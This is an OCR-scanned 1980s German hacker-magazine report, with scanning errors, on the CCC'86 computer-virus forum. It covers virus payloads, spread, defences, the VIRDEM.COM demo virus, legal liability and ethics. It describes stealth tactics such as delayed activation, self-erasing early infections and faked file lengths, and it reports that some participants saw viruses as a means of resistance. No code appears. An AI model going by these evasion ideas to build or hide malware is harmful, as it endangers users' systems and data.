Die Verbreitungsfähigkeit der Viren ermöglicht das 
unkontrollierte Einschleusen von Manipulationsauf¬ 
gaben. Diese Aufgaben können frei nach der Lei¬ 
stungsfähigkeit des ausgewählten Betriebssystems 
gestaltet werden. 



OS Saitd Ach 




Der Phantasie keine Grenze gesetzt. . . 

Der Phantasie eines VirenProgrammierers sind kaum 
Grenzen gesetzt. Da davon auszugehen ist, daß Viren, 
die ihre Manipulationsaufgabe gleich nach dem er¬ 
sten Infektionsvorgang beginnen, relativ schnell auf- 
fallcn, geben viele Programmierer den Viren eine 
Schlafroutine mit auf die Reise. So kann das Virus 
eine hohe Verbreitung finden, bevor die Manipula¬ 
tion in verseuchten Systemen auflriit und der Virus¬ 
befall erkannt wird. Um den Ursprung einer Verseu¬ 
chung zu verdecken, könnten z.B. die ersten tausend 
infizierten Programme zusätzlich einen Regencra- 
tionsaufrag erhalten. Noch vor Inkrafttreten de.s Ma- 
nipulationauflrages löschen sich diese Viren aus ih¬ 
ren Wirtsprogrammen heraus. Eine Analyse des In- 
feklionsweges (wer hat wen verseucht) ist dadurch 
fast unmöglich. 

Ausschlaggebend ist der Zweck 

Für das Opfer ist es von wesentlicher Bedeutung fest- 
zustcllen, welcher Zweck mit einem Virenangriff ver¬ 
folgt wird. Es kann hilfreich sein, feslzustellen, ob be¬ 
stimmte Daten zum Vor- oder Nachteil Dritter gezielt 
verändert wurden, um den Schaden, die Folgen und 
den möglichen Täterkreis cinzugrenzen. Handelt cs 
sich "nur” um eine ungezielie Verseuchung, so kann 
womöglich eine hinterlistige Sabotage zum Vorteil 
Dritter ausgeschlossen werden. 

Auf dem CCC‘86 berichteten Teilnehmer über ver¬ 
schiedene Manipulationsaufgaben von Viren. So gibt 
es Viren, die Daten aus unzugänglichen Speicherbe¬ 
reichen in für den Anwender zugängliche kopieren. 
Es wurde von einem Virus berichtet, der über jedes 
infiziene Programm eine "LogDaiei” anlegt, in der 
notiert wird, wer wann mil welchem Kennwort dieses 
Programm benutzt hat. Weiter wurde von Viren be¬ 
richtet, die Programme und/oder Daten zerstören, 
bzw. verfälschen. Sie finden vorwiegend in Freeware 
und Raubkopien Verbreitung. 

Der Schaden und/oder Nutzen eines Virus hängt 
vom Entwickler bzw. den Verbreitern eines Virus ab. 
Wohl die Hauptursache für "Rache” sind schlechte 
soziale Bedingungen für Programmierer. Daneben 
fördern Neid. Mißgunst und Ohnmacht die Bereit¬ 
schaft zum böswilligen Vireneinsatz. Die Hauplgc- 
fahr sicht Rüdiger Dierstein (DFVLR) im vorsätzli¬ 
chem Handeln. Die Wahrscheinlichkeit durch Spiel¬ 
trieb ("Mal sehen was passiert”) ein System zu infi¬ 
zieren, stellt ebenso ein Risiko dar. Statistisch un¬ 
wahrscheinlich ist für Dierstein auch die unabsichtli¬ 
che Generierung von Computerviren auf dem eige¬ 
nen DV-System, zum Beispiel durch eine Ansamm¬ 
lung zufälligerSpeicherreste. 

Auch positive Ansätze 

Inwieweit ComputerViren auch zu positiven Aufga¬ 
ben eingesetzt werden können, hängt von der Isola¬ 
tion des betroffenen DV-Systems ab. Zwar lassen sich 
Viren auch mit "guten” Eigenschaften versehen, wie 
z.B. eine Routine, die Daten komprimiert und da¬ 
durch den Speicherbedarf senkt. Jedoch kann auch 
ein solch "guter” Virus bei unkontrollierter Verbrei¬ 
tung für Ärger sorgen. 


VorteilhaM ist die Verbreiiungseigenschal i nur, wenn 
nachträglich in alle Programme lusäizliche Funktio¬ 
nen eingebaut werden sollen. Dieses könnte z.B. ein 
Virus sein, der die Programme um eine Kennwortab¬ 
frage erweitert. Möglich ist auch ein Virus zur Mitar- 
beiterkonirolle. Einmal ausgesetzt, liefert dieses Vi¬ 
rus fortan genaue Nuizungsdaien der Mitarbeiter. 
Damit lassen sich Unregelmäßigkeiten in der An¬ 
wendung erkennen ("ZimmermannVirus”). 

Viren als Diebstahlsschutz 

Rechtlich womöglich zulässig, aber dennoch frag¬ 
würdig, sind Viren als Diebstahlsschutz. Sofiwarean- 
bieter wären in der Lage, auf Mes.sen ihre Programme 
mit Viren zu versehen, um dadurch nach einer Ent¬ 
wendung der Software den Verbreitungsweg von 
Raubkopien zu verfolgen. 

Vireneigenschaft als Architekturprin¬ 
zip? 

Viren mit kontrollierbaren Verbreitungswegen kön¬ 
nen positiv genutzt werden. Inwieweit die virulente 
Eigenschaft neue Architekturen in der Gestaltung 
von Betriebssystemen und Programmen ermöglicht, 
ist noch unbekannt. 

Erkannte Verbreitungswege von 
ComputerViren 

Risikogruppe Personalcomputer 

Derzeit sind alle Personalcomputer für einen Viren¬ 
befall prädestiniert. Zum einen verwenden viele An¬ 
wender Computer mit weit verbreiteten Betriebssy¬ 
stemen (z.B, MS-DOS), zum anderen tauschen viele 
der Anwender ihre Programme untereinander und 
leisten der “Verseuchung” dadurch Vorschub. 

Verschleppte Seuche 

"Häufiger Disketientausch mil w-echselnden Part¬ 
nern birgt ein hohes Infektionsrisiko”. Die bei Perso¬ 
nalcomputern am häufigsten bekanntgewordene 
Verbreitungsform von Viren findet auf Disketten 
statt. Congressteilnehmer bestätigten, daß Freeware 
(Programme zum Tauschen) bisher häufig als Seu- 
cheniräger mißbraucht wurden. Dies wirft leider ein 
schlechtes Licht auf eine an sich positive Form der 
Softwareverbreitung. 

Vorsätzliche Sabotage 

Herkömmliche Personalcomputer bieten oft keinen 
Schutz gegen Fremdbenutzung. An den Stellen, wo 
technische Hilfsmittel (Schlösser. Chipcard) den Zu¬ 
griff begrenzen, könnten sich Saboteure die men¬ 
schliche Unzulänglichkeit zunutze machen. Wird ein 
Virus in einem Spielprogramm versteckt, reicht es, die 
Diskette in die Nähe der DV-Anlage zu bringen. Ir¬ 
gendein Neugieriger wird das Spiel leichtsinniger¬ 
weise ausprobieren. 

Viren können über jede zugängliche Eingabeschnitt¬ 
stelle in eine DV- Anlage gelangen. Dieses könnte die 
Konsole eines unbeaufsichtigten Terminals sein oder 
eine Fernzugriffsmöglichkeil wie die Fernwartung. 
Es ist auch denkbar, ComputerViren versteckt in eine 
zum Abruf angebotene Telesoftware, etwa aus dem 
Bildschirmtextsystem, auf den eigenen Rechner zu 
laden. 


SdiciiMjIciiher 


DS Saite Noin 




Viren sind bei ihrer Ausbreitung nicht auf Schwach¬ 
stellen oder verdeckte Kanäle angewiesen. Ist ein Vi¬ 
rus erst einmal in ein DV-Sysiem gelangt, breitet es 
sich auf den legalen Pfaden der Benutzer aus. Wird 
das Virus als wichtige Utility (Hilfsprogramm) ge¬ 
kennzeichnet, so steigt womöglich das Bedürfnis der 
Anwender dieses Programm zu testen. Auf diesem 
Wege wird das Virus in alle Zugangsbereiche des je¬ 
weiligen Anwenders und/oder des Programmes ver¬ 
schleppt. 


Schutz vor Viren 


’Wiren sind dann gut, wenn der Entwickler des Virus 
das Serum nicht entwickeln kann" so ein Teilnehrher 
des CCC*86. 

Isolierte Systeme 

Isolierte Systeme bieten Saboteuren wenig Angriffs- 
mögilchkeiten. Ein isolierter Personalcomputer 
kommt jedoch selten vor. So werden beim Militär die 
Wcchsclplatten (u.a. Wang 20MB) aus der Zentra¬ 
leinheit herausgenommen und im Tresor verschlos¬ 
sen. Aber auch dort besteht die Gefahr, daß dem An¬ 
wender ein infiziertes Programm untergeschoben 
wird. 

Keine "fremden” Programme 

Einfach, aber unpraktikabel ist die Methode keinerlei 
Fremdsoflware auf dem Rechner zu starten, ge¬ 
schweige denn einzusetzen. Beim Kauf or^inalversie- 
gelter Programme ist eine Gefährdung im Prinzip 
weitgehend ausgeschlossen. Kommerzielle Anbieter 
können es sich aus haftungstechnischen Gründen 
nicht leisten, Software mit virulenten Eigenschaften 
zu vertreiben. 

Gefahr des Verschleppens 

Es ist möglich, daß ein Virus von einem infiziertem 
System durch den Servicehändler verschleppt wird. 
Ebenso ist unklar, inwieweit anwenderspezifische 
Programmpakete nicht durch Fahrlässigkeit des 
Händlers oder Herstellers verseucht sein könnten. 
Vorsicht ist geboten bei Programmen, die z.B. aus 
Mailboxsystemen geholt oder von "Freunden" ko¬ 
piert wurden. "Einem Programm - und damit letztlich 
dem ganzen DV-SysIem - kann man nur genau soviel 
und genau so wenig Vertrauen schenken, wie dem, 
der es geschrieben hat". Zu dieser Erkenntnis kam 
der DATENSCH UTZBERATER (10/85). 

Vorsätzliche Manipulation 

Da von den Herstellern kaum technische Zugriffsbe- 
schränkungen angeboten werden und diese auch nur 
selten von den Anwendern genutzt werden, stellt die 
Überwachung der befugten Rechnernutzung ein bis 
heute nicht gelöstes Problem dar. Neben Zugriffsmö¬ 
glichkeiten durch Dritte sollte der Schulz vor böswil¬ 
ligen Mitarbeitern nicht vergessen werden. Sicher¬ 
heitssensible Leiter von Rechenzentren lassen ihre 
Programmierer bei Ausspruch der Kündigung nicht 
mehr an die Rechner und ändern alle relevanten 
Fernzugriffsmöglichkeiten. 


Schwer erkennbare Verseuchung 

Um ein Virus zu erkennen, muß feslgestellt werden, 
ob das mutmaßliche Virus andere Programme infi¬ 
ziert. So einfach diese Regel ist, so schwer ist es, sie zu 
befolgen. Tatsache ist, daß man Programme schrei¬ 
ben kann, von denen nicht feststellbar ist, ob sie sich 
wie ein Virus verhalten oder nicht. 

Bei geschickter Programmierung fallen Viren auch 
nicht durch langsamere Lade- oder Laufzeiten der 
Programme auf. Viren mit hoher Rechenzeit könnten 
lokalisiert werden. Klar sollte jedoch sein, daß bei al¬ 
ler Sucherei ein einziges überlebendes Virus in den 
Datenbeständen genügt, um die Infektion erneut zu 
starten. 

Vergleichsprozeduren zwischen gesicherten Pro¬ 
grammen und den auf aktuellen Festplatten gespei¬ 
cherten Programmbeständen ermöglichen das Er¬ 
kennen von Unterschieden wie Länge und Inhalt. 
Das die "Seuche" auslösende Programm kann aber 
schon vor Monaten in die gesicherten Datenbestände 
übernommen worden sein. Die Verbreitung kann da¬ 
durch jederzeit wieder gestartet werden. 

An dieser Stelle sollte erwähnt werden, daß Viren fä¬ 
hig sind, alle Schreibschutzattribute (Ausnahme 
Hardwareschreibschutz an der Diskette), Datums¬ 
und Namenseinträge zu ignorieren, beziehungsweise 
wieder herzusiellen. Ein infizienes Programm muß 
auch nicht unbedingt seine geänderte Länge anzei- 
gen: ein für den C64 entwickelter Virus täuscht die 
ursprüngliche Länge im Verzeichnis geschickt vor. 
Eine Hilfe für Anwender ist ein hardwaremäßiger zu- 
schaUbarer Schreibschutz für Festplatten. Damit 
könnte geprüft werden, ob Programme, die nur eine 
Leseberechtigung haben, unberechtigterweise auf die 
Festplatte schreiben wollen. Dies ist eine Möglich¬ 
keit, bei der Installation neuer Software das Verhal¬ 
ten der Programme zu überprüfen. Gegen Viren, die 
sich erst mit Verzögerung verbreiten, hilft diese 
arbeitsintensive Methode jedoch nur bedingt. 

Hilfe durch "Kontrolldatei” 

Eine begrenzte Möglichkeit sahen Congressteilneh- 
mer darin, über ihre Dalenbestände eine Prüfsumme 
anzulegen. Bei einem Virenbefall würden dann die 
infizierten Programme erkannt werden. Jedoch muß 
bei dieser Methode eine vollständige Isolation der 
Prüfprogramme gewährleistet sein. Ein Virus könnte 
sonst Prüfsumme oder Prüfprogramm gezielt angrei¬ 
fen. 

In diesem Zusammenhang erhielten wir von Ralf 
Burger Hinweise über ein "Schutzprogramm" (MS- 
DOS), welches unter anderem auf der Basis von Kon- 
trolldateien arbeitet. Sobald dieses Programm seine 
Funktionssicherheit unter Beweis gestellt hat, werden 
wir darüberberichten. 

Was tun Wenn? 

Ohne einen umfassenden vorbeugenden Schutz vor 
ComputerViren ist cs bei einem Virenbefail um die 
entsprechende Datenverarbeitungsanlage schlecht 
bestellt. In jedem Fall sollte keine Software mehr 
verbreitet werden. Ebenso müssen alle Tauschpartner 
umgehend informien werden. Weiterhin sollten alle 
Datenbestände von den Programmen getrennt gesi¬ 
chert werden. Die "verseuchten" Programmbestände 
müssen isoliert werden und dürfen Jteinesfalls mehr 
mit dem System genutzt werden. 


^(ticnd(f|(cuhcc 


Unter Umständen läßt sich aus den "verseuchten" 
Programmbeständen das Virus und deren Manipula¬ 
tionsaufgabe isolieren. Gelingt dies, so besteht Hoff¬ 
nung, den ordnungsgemäßen Stand der manipulier¬ 
ten Daten wiederherzustellen. Andernfalls sind die 
vermutlich manipulierten Datenbestände Grundlage 
für den weiteren Betrieb der DV-Anlage. 

Zur Verarbeitung der Daten wird eine vollständig 
neue Programmoberfläche benötigt. Deshalb sollten 
alle Programme erneut von den Herstellern angefor¬ 
dert werden. 

Anzumerken sei an dieser Stelle, daß der Geschädigte 
den Schaden eines Virenbcfalls selber tragen muß, 
wenn erden "Saboteur" nicht überführen kann. Dies 
ist auch Voraussetzung für die Inanspruchnahme 
üblicher "Mißbrauchs-Versicherungen". Ein lücken¬ 
loser Schuldnachweis ist jedoch bei ComputerViren 
kaum möglich. 

Mehr Forschung und Information 

KES(4/85) ruft zur Intensivierung der Forschung auf 
diesem Gebiet auf. Forschungsergebnisse sollen zu¬ 
künftige Entwicklungen von Abwehrmaßnahmen 
ermöglichen. Ziel ist es: Die Risikoschwelle (schnel¬ 
lere Entdeckung) für den Eindringling zu erhöhen. 
Weiterhin wurde dort die Erstellung eines Sofort- 
Maßnahmen-Katalogs gefordert. Das spiegelte sich 
auch in den Beiträgen der Congressteilnehmer 
wieder. Konsens des Congresses ist, daß nur durch 
Aufklärung und Information ein Bewußtsein für die¬ 
se Entwicklung gefördert werden kann und muß. Der 
CCC wird dieses Thema auf einem II. PC-VirenFo- 
rum im April weiterbchandeln. 


Teil 3 

Das Demoprogramm 
VIRDEM.COM (MS-DOS) 

Auf dem CCC’86 wurde im Rahmen des VirenFo* 
rums ein DemoVirus vorgestellt. V1RDEM.COM 
wurde von Ralf Burger entwickelt, um die Möglich¬ 
keit eines gefahrlosen Arbeitens mit Viren zu bieten. 
Das Demoprogramm mit Hinweistexten ist von der 
Redaktion zu beziehen (MS- DOS 360KB Disk oder 
über Btx als Telesoftware). Das Programm verdeut¬ 
licht, wie hilflos ein Anwender gegenüber Computer¬ 
viren ist, wenn er nicht entsprechende Sicherheits¬ 
vorkehrungen trifft. 

Das Programm VIRDEM.COM ist ein relativ harm¬ 
loses Virus, das Programme nicht zerstört und nur auf 
Diskettenlaufwerk A zugreift. Das Virus erweitert 
seine Wirtsprogramme um eine zusätzliche Funktion. 
Außerdem mutiert das Virus seine Funktion bis zur 9. 
Generation. 



®ntciiädj(citÄcr 


Die Funktion des Virus ist ein Ratespiel. Beim Start 
eines infizierten Programmes meldet sich das Virus 
"VIRDEM Ver.: l .0 (Generation ?) aktiv" und fragt 
eine Zahl ab. Je nach Virengeneration liegt diese Zahl 
zwischen null und neun. Bei einer Fehleingabe wird 
das Wirtsprogramm nicht ausgeführt. 

VIRDEM,COM wurde entwickelt, um allen MS- 
DOS Anwendern die Möglichkeit zu bieten, sich mit 
Computerviren zu beschäftigen, ohne den Gefahren 
eines unkontrollierten Virenbefalls ausgesetztzu sein. 
Sofern die Handhabungshinweise beachtet werden, 
besteht keine Gefahr einer unbeabsichtigten Verbrei- 
tung. 

Die Redaktion geht davon aus, daß nur mit sehr ho¬ 
hem Aufwand weitere bösartige Manipulationen in 
den DemoVirus eingebaut werden können. Achten 
Sie trotzdem darauf, aus wessen Händen Sie das De¬ 
moVirus erhalten. Die Redaktion versendet auf 
Wunsch die Orginalvirendiskette versiegelt. 


Teil 4 


Juristische Hinweise 

zum Umgang mit GompuferViren 


Die Thematik juristischer Konse¬ 
quenzen beim Umgang mit Compu¬ 
terViren wurde im Rahmen des Vi- 
renForums nicht detailliert behandelt. 
Die Diskussion auf der CLINCH- 
Mailbox zeigt allerdings eine uner¬ 
wartete Resonanz zu diesem Thema. 
Im folgenden einige Auszüge. 

Experimente mit ComputerViren 

Experimente mit Computerviren bedürfen einer ge¬ 
wissen Sorgfaltspflicht. Gewissenhafte Programmie¬ 
rersollten sich nicht dem Vorwurf unlauterer Absich¬ 
ten fahrlässig aussetzen. 

"Man sollte auf jeden Fall darauf achten, daß man 
keine Programme weitergibt, die ohne weiteres Zutun 
Dritter die wesentlichen Eigenschaften eines Virus 
entwickeln. Desweiieren sollte man Virus- Program¬ 
me sicher aufbewahren, damit man dem Vorwurf ent¬ 
geht, man habe einen späteren Täter damit zur An¬ 
wendung anleiten wollen. Ferner ist dafür Sorge zu 
tragen, daß es demjenigen, der aus einem weitergebe¬ 
nen SOURCE-CODE schließlich das VirusPro- 
gramm generiert, nicht erspart bleibt, einen ausführ¬ 
lichen Hinweis auf die Gefährlichkeit des Program¬ 
mes, sowie die Tatsache, daß der Autor ein Inver¬ 
kehrbringen desselben ablehnt, zur Kenntnis zu 
nehmen." 


DS Saite Zeen 


DS Saite Elph 






Haftungsrechtliche Fragen 

Eine der wichtigsten Fragen im Umgang mit Viren 
sind haftungsrechtliche Konsequenzen. Wir möchten 
hier nur einige Beispiele für denkbare Ansprüche der 
Opfer von Viren nennen und auf beweisiechnische 
Probleme nicht weiter eingehen. 

"Für Fehler (Bugs) in kommerziell verbreiteter Soft¬ 
ware haftet der Hersteller. Dieser Grundsatz deckt 
teilweise auch diejenigen Schäden ab, die durch die 
Anwendung grob fehlerhafter Programme entstehen. 
Selbstverständlich sind nur die Programmversionen 
von dieser Maxime gedeckt, die der Hersteller offi- 
ziell ausgellefe.rt hat. Demnach haftet der Hersteller 
schon dann nicht mehr in vollem Umfang, wenn der 
Anwendersich die Programme auf illegale Weise ver- 
schaft hat (Industriespionage, Softwarepiraterie) 
oder eine Version des Programms benutzt, die sich in 
der Struktur wesentlich vom ausgelieferten Orginal 
unterscheidet. Fazit: Keine Haftung des Herstellers 
bei Schäden durch 'verseuchte' Programme. 

Der für die Verbreitung eines Virus Verantwortliche 
muß nicht nur für die Kosten aufkommen, die (wenn 
überhaupt möglich) die Wiederherstellung der Soft¬ 
ware erfordert, sondern auch für die durch die übri¬ 
gen Aktivitäten des Virus entstandenen Schäden. 
Diese können die Schäden in der Software weil über¬ 
steigen, ja möglicherweise einen Umfang annehmen, 
den keine Privatperson mehr abdecken kann." 


Strafrechtliche Aspekte 

Das größte Problem für den Entwickler von Viren ist 
die strafrechtliche Relevanz seines Handelns. Das 
Entwickeln und anschließende Verbreiten eines Pro¬ 
grammes ist solange nicht strafbar, wie sich keine 
Straftatbestände finden lassen. Da der Entwickler 
beim Virus am Schadenseintritt wiederholt mittelbar 
beteiligt ist, kommt hier Anstiftung oder Beihilfe zu 
den einschlägigen Straftaten in Betracht (allerdings 
bekanntlich mit derselben Strafdrohung, wie die 
Haupttat). Hier einige Leitsätze, die eine Hilfestel¬ 
lung geben können. 

"Das Verhallen desjenigen, der einen Virus verbreitet 
(oder verbreiten läßt) ist dann strafbar, wenn er den 
Eintritt eines Schadens verursachen will. Eine Straf¬ 
barkeit ist auch dann anzunehmen, wenn der Scha- 
denseinlrilt für wahrscheinlich gehalten und nichts 
zu dessen Abwendung unternommen wird. Proble¬ 
matischer ist der Fall, wenn ein Dritter, der die Virus- 
Routine erstmals vom Entwickler erhalten hat, sich 
entsprechend der ersten beiden Leitsätze strafbar 
macht. Hier könnte der Entwickler dann mit zur Ver¬ 
antwortung gezogen werden, wenn dieser mit der 
Reaktion des Dritten rechnen konnte. 

Die Folgen des Einsatzes von CompuierViren sind 
unabsehbar und im Falle erfolgreicher Ermittlungen 
vom Verursacherzu tragen. Inwieweit der Entwickler 
zum Kreis der Verursacher zu rechnen ist, hängt vom 
Einzelfall ab; aufgrund seiner Kenntnisse obliegt ihm 
abersicherlich eine besondere Sorgfaltspflicht." 
Soweit einige Hinweise für experimentierfreudige 
Programmierer. Wer Viren vorsätzlich auf fremden 
Computern ohne Zustimmung des Eigentümers ver¬ 
breitet, verstößt gegen eine Reihe von Gesetzen. Die 
strafrechtlichen Hinweise erscheinen uns unter Be¬ 
rücksichtigung der drohenden haftungsrechtlichen 
Ansprüche fast schon als sekundär. 


Veröffentlichung von Computerviren 

Mailboxbetreiber, die Viren in ihren Systemen zum 
Abruf anbielen, sollten die Diskussion im Brett 
"Rcchtswesen” der CLINCH-Mailbox beachten. 
Dort werden weitere Hinweise auf die Problematik 
der Veröffentlichung von Viren gegeben. 

"Eine Strafbarkeit (und zivilrechtliche Haftung) we¬ 
gen der Veröffentlichung von Virusprogrammen 
unter dem Gesichtspunkt der Anstiftung zur Daten¬ 
veränderung (etc.) sollte ausgeschlossen sein, wenn 
kein - auch versteckter - Vorschlag gemacht wird, die¬ 
ses Programm ohne Einwilligung auffremdeCompu- 
ter zu portieren. Zusätzlich würde ich sicherheitshal¬ 
ber empfehlen, ein Virusprogramm nur zusammen 
mit einer erkennbar ernstgemeinten Warnung vor den 
tatsächlichen und rechtlichen Folgen einer Portie¬ 
rung des lauffähigen Programmes zu veröffentlichen. 
Bei Beachtung dieser Empfehlung halte ich die Ver¬ 
öffentlichung von Virusprogrammen insoweit für 
(rechtlich) unbedenklich." 

Wer mit Viren experimentiert, sollte sich der rechtli¬ 
chen Konsequenzen bewußt sein. Nicht nur der hö¬ 
fliche, sondern auch der vorsichtige Mensch behält 
seine Viren daher vielleicht besser bei sich. 

Teils 


Ansichten und Einsichten 

der Diskussion im PC-Virenforum 


"Ich verfluche den Tag, an dem ich mir eine Festplat¬ 
te zugelegt habef". Erste Reaktionen auf das Wissen 
um ComputerViren. Während im ersten Block des Vi- 
renforums hauptsächlich sachliche Informationen 
über ComputerViren vermittelt und von den Teil¬ 
nehmern ergänzt wurden, war für den zweiten Teil 
eine Diskussion über die Folgen und den Umgang 
mit ComputerViren geplant. 

Als die Bayrische Hackerpost im Frühjahr 1985 erst¬ 
mals über Computerviren berichtete, stand die Com- 
pulerWoche Kopf und verglich Hacker mit der RAF. 
Eine Panikreaktion. Derartige Informationen aus 
solch einer Ecke sind wohl eher geeignet, kriminelle 
Potentiale zu entwickeln, war die Schluß’Tolgerung" 
der CompmerWoche. Das Unverständnis, dieses 
Thema zu bewältigen, führte zum Aufbau eines 
Feindbildes. Solchen Auswüchsen wollte sich der 
CCC in seiner Informationspolitik nicht ausseizen. 
Deshalb setzte schon Mitte ’86 eine Diskussion über 
ethische Fragen beim Umgang mit ComputerViren 
ein. Ziel unserer Informationspolitik sollte nicht ’T- 
anikmache” oder das Hcraufbeschwören einer Ge¬ 
fahr sein, sondern eine öffentliche Diskussion zur 
Vermittlung eines gesteigerten Unrechts- und Pro¬ 
blembewußtseins. Der Chaos Communication Con- 
gress wurde als Forum bestimmt. Der Congress bietet 
eine Atmosphäre des Miteinanders, etwas, das auf 
kommerziellen Veranstaltungen unmöglich ist: offe¬ 
ne Diskussion ohne Vorbehalte. 


OS Saite Zwölph 




Im wesentlichen stellte sich die Frage: wie weil geht 
die Informationspolilik? Setzen wir uns bei der Ver¬ 
öffentlichung eines SOURCE-CODES dem Vorwurf 
aus, ßauanleitungen für logische Bomben zu verbrei¬ 
ten? In wieweit regen wir Nachahmungstäler an? 
Stellt schon eine detaillierte Veröffentlichung dieses 
Wissens eine Gefahr dar? Hier ergaben sich die 
unterschiedlichsten Betrachtungen. 

Fesizusiellen war. daß Programmierer von Conipu- 
terViren mit ihrem Wissen bisher sehr verantwor¬ 
tungsvoll umgehen. Viele von ihnen fragen sich, was 
sie überhaupt damit machen sollen. Die Skrupel vor 
dem Vireneinsatz sind unterschiedlicher Natur. Ein 
Programmierer meinte: "Ich habe soviel Arbeit inve¬ 
stiert, jetzt will ich auch sehen, was passiert" (auch 
die Atombombe mußte ausprobiert w'erden). Über¬ 
wiegend sprachen die Congress-Teilnehmer sich 
gegen die bloße Veröffentlichung von Programm- 
quellcodc aus. Und wenn, dann nur mit eindeutigen 
Informationen über die Folgen und den Umgang mit 
ComputerViren. Einzelnen erschien schon die Be¬ 
schreibung "überschreibender" und "nichlübcr- 
schreibender" Viren als zu detailliert. Fast durchgän¬ 
gig forderten die Teilnehmer eine offene Informa¬ 
tionspolitik. Die freie Forschung im Sinne des "Free 
Flow Of Information Act" soll helfen, positive An¬ 
sätze zu entwickeln. 

"Veranstaltungen wie der CCC'86 erzeugen keine 
entscheidende Veränderung beim Umgang mit Com¬ 
putern. Sie vermitteln eher ein Bewußtsein von der 
Tragweite des Handelns" formuliene ein Teilnehmer. 
Bisher wird, was ComputerViren betrifft, der Kreis 
der "Informierten" noch als sehr klein eingeschätzt. 
Daß detaillierte Informationen über ComputerViren 
Nachahmungstäler anlocken, muß in Kauf genom¬ 
men werden, wenn der schleichenden Entwicklung 
enigegengearbeitet werden soll. Die Geschichte hat 
gezeigt, wie gefährlich es ist, Sicherheitsfragen von 
der offenen Diskussion unter Fachleuten auszuneh¬ 
men. Die Affäre um Sicherheit oder Unsicherheit des 
Geheimcodes der deutschen Führung im zweiten 
Welktkrieg ist als abschreckendes Beispiel oft genug 
erwähnt worden. Vielmehr erwarten Congressteil- 
nehmerdie Einleitung einer öffentlichen Diskussion 
über die "Restrisiken” neuer Technologien. Gerade 
die Popularität des CCC, der seit jeher technikkriti¬ 
sche Themen erörtert, soll helfen, dieses Thema einer 
offenen Diskussion zuzuführen. 

Erstaunlich waren Thesen über "WiderstandsViren". 
So sahen einige Congresslellnehmer in ComputerVi¬ 
ren ein legitimes Mittel zum Volkswiderstand gegen 
unmenschliche, zentralisierte Grossrechenzentren. 
Auch deuten einige Hinweise aus der Scene auf einen 
Virusangriff gegen die Volkszählung hin. Parallelen 
zum Science Fiction-Roman "Der Schockwellenrei¬ 
ter”, in dem John Brunner (Heyne SF 3667) schon 
1975 das Bild einer computerabhängigen Welt zeich¬ 
nete, die durch ein "Wurmprogramm” befreit wird, 
sind erkennbar. 

Frankreich entschied sich im Gegensatz zur BRD 
bewußt gegen die Einführung eines maschinenlesba¬ 
ren Ausweises. Der Grund: Demokratische Systeme 
benötigen einen Spielraum, der Widerstand gegen 
diktatorisches Takeover ermöglicht. So wurde die 
Forderung laut, dieses technisch spezialisierte "Her¬ 
rschaftswissen" auch als "WiderstandsWissen" zu 
fördern. Dem entgegen stand der überwiegende Teil 
der Besucher mit der Auffassung, daß Hacker sich 
nichl außerhalb der Gesetze steifen wollen, sondern 
eher einen Spielraum ausnutzen, um auf Gefahren 
aufmerksam zu machen. 

SfKcilSdjfciibci* 


Weitgehend unberücksichtigt blieb in den Diskussio- 
tien das Potential krimineller Kräfte, die sich Vorteile 
durch den Einsatz von Viren verschaffen könnten. 
Weiterhin dürfen politische Gegner, sowie Geheim¬ 
dienste und terroristische Gruppen bei der Gefahre- 
nabschäizung nichl vergessen werden. Wo ökonomi¬ 
sche oder ideologische Beweggründe vorliegen, ist 
die Gefahr einer VirusAttacke weitaus wahrscheinli¬ 
cher als aus den Reihen der privaten Compulcran- 
wender. Diese handeln viel eher verantworlungsbe- 
W'Ußt. 

So wurden Forderungen laut, daß ComputerSysteme. 
die personenbezogene Daten verarbeiten oder hoch- 
kritische Steuerfunktionen (zB. in Atomkraftwerken) 
übernehmen, absolut virensicher sein müssen. An¬ 
dernfalls darf man derartige Aufgaben nicht solchen 
anfälligen Technologien überantworten. Weiterhin 
muß eine ethische Barriere gegen den Compuiermiß- 
brauch, aber auch gegen den fahrlässigen Computer- 
gebraiich aufgebaut werden. Folgend sollen For¬ 
schungsergebnisse die Entwicklung von Abwehrme¬ 
chanismen ermöglichen. Die Erhöhung der "Risiko¬ 
schwelle" (schnellere Entdeckung) ist jedoch nur eine 
technische Hilfe, die weiterhin ein "Restrisiko” auf- 
wei.st. 

"Das Problem sind nicht die ComputerViren, son¬ 
dern die Katastrophen, die durch die Abhängigkeit 
von Technologien entstehen", so die Schlußfolge¬ 
rung eines Congress-Teilnehmers. Nach Jahren be¬ 
denkenloser Technologiegläubigkeit forderten die er¬ 
sten technischen Mega-Katastrophen (Bhopal, 
Tschernobyl, Basel) ihre Opfer. Der CCC fordert seil 
langem eine süzialverträgliche Gestaltung von Tech¬ 
nologien. Die unverträgliche Verbraucherhaftung bei 
Mißbrauch von Bildschirmtext oder Euroscheckkar¬ 
ten waren einige kritische Ansätze aus der letzten 
Zeit. Die ComputerViren stellen nun eine neue, äu¬ 
ßerst brisante Erscheinung im Kräftespiel moderner 
Techniken dar. Wissenschaftler erörfern seil einiger 
Zeit "The Uliimaie Error Message", den Weltkrieg 
durch einen Computerfehler. 

Die Aufarbeitung des CCCongress'86 anhand einer 
Videodokumentaiion zeigt bisher unerörterte Berei¬ 
che auf. Die Redaktion geht davon aus, daß in den 
nächsten Monaten weiteres Material über Compu¬ 
ierViren veröffentlicht wird, 

Der CCC veranstaltet daher am 18. und 19.April '87 
ein weiteres VirenForum. Ein Anmeldeformular er¬ 
scheint in der DATENSCHLEUDBR 19. (Zum April 
wird auch die Videodokumentation über den CCC'86 
ferliggeslellt sein.) 



DS Saite Dralzean 





w S '7/i the Defense Department. They're caUing around the 
^ I neighborhood to see tf anyone can help themßgure out why 
i J every one oftheir missiles keeps overriäing their commands and 
5 •» aimmg themselves ai bfrs. O'ReUly’s house down the block. ’’ 


^ Für eine H^ndvoll. Daten 

De-Anonymisierung des gezählten Volkes 



Es begab sich aber zu der Zeit, daß ein Gebot ausging 
von dem Kaiser Augustus, daß alle Welt sich schätzen 
ließe (Chaos-Textbaustein 42). 

So wurde zu biblischen Zeiten die Tatsache doku¬ 
mentiert, daß jede Regierungsform Informationen 
überdie Regierten benötigt, also Daten, anhand derer 
man Entscheidungen für die Zukunft treffen kann. 
Dieses legitime Bedürfnis findet sich heutzutage we¬ 
sentlich prosaischer formuliert im Volkszählungsge¬ 
setz wieder. Indula (Textbaustein aus dem CDU- 
Textsystem; bedeutet ’in diesem unseren Lande*) 
werden traditionel) Erhebungen durchgefuhrt, die 
aufschlußreiche Daten zur Befriedigung des Infor¬ 
mationshungers der Behörden und der Wirtschaft lie¬ 
